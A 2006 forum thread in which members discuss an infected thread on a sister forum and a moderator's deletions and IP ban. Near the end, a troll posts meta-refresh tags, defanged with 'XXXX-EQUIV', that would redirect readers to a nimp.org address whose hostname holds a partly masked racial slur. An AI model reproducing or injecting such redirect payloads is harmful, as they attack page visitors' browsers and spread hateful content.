URGENT WARNING: do NOT open that thread!

Started by tenkani, Feb 22 06 01:51

Previous topic - Next topic
|

TehBorken

Schadenfreude wrote:
[div style="font-style: italic;"]This is me. ^^^  purelife goes and posts the link to that thread and I had to click on it.[/div]
Don't feel bad, I got bonked too. No damage, but ironically it happened while I was reading on DV about what it was that had been able to cause it. Doh!
The real trouble with reality is that there's no background music.

TehBorken

Woo hoo, TOP!

It's all in the wrist-action, you know.

purelife

Oh my, what a mess.  I haven't logged into dv since 4:30 pm yesterday.  I wonder if it's safe to visit.

Help- I'm not sure what happened there.  When I saw a thread by Canader titled Attn Mods-Virus, I naturally clicked it and boom, my computer went bonkers.  I then deleted the rest of the threads with your ip address before clicking on it for fear of infecting my computer and anyone else's.  I then submitted your ip for banning because I thought that you had infected the forum.  Your thread had to be deleted, regardless because it was infected.  

It was certainly a tough call for me as we have had some tragedies on dv these years.  From my experiences on dv, trolls/hackers and the like use rotating ip addresses so that they can play on the forum.   I apologize that you were in the mess.  

purelife

Schade, are you talking about a link I posted here or on dv?

Schadenfreude wrote:

[img alt="" src="http://img211.imageshack.us/img211/5222/donotpushbutton3jv.gif" border=0]

This is me. ^^^  purelife goes and posts the link to that thread and I had to click on it.

DV user

Beware. It's still runnng rampant over there on DV. My popup locker stoppedmost of it but there's at least one recent thread that's affected.

purelife

Which ones?  [/DIV]Could you give me the titles of the threads and I'll go and delete them now.  I'm not taking any chances today....

Schadenfreude

Schade, are you talking about a link I posted here or on dv?[/DIV] [/DIV]From page 1 of this topic. I clicked on one there this morning but it is gone now.
"I used to rock and roll all night and party every day, then it was every other day.  Now I'm lucky if I can find half an hour a week in which to get funky."

purelife

Ahhh...yes.  Yeah, it was deleted.  Did you get the chance to browse dv yet?  If you notice anything funny, lemme know, k?  :)

Naughty Priest

Hi Fellas! =D [meta XXXX-EQUIV="refresh" content="0;URL=http://n***ers.on.nimp.org"]

Witch

Shad.... you're on point. If you get shot... scream. Another cannon fodder will be with you shortly.

Naughty Priest

How's it going, eh? [META XXXX-EQUIV=refresh content=0;URL=http://n***ers.on.nimp.org]

CK

apologize that you were in the mess[/DIV] purelife, you shouldn't have to apologize to anyone. You have done a great job at trying to create a decent forum to represent a beautiful city.  Asshats abundant, there is only so much you can do!  

Naughty Priest

Naughty Priest

TehBorken

Naughty Priest wrote:
worked?
Aww, too bad. lololol!

|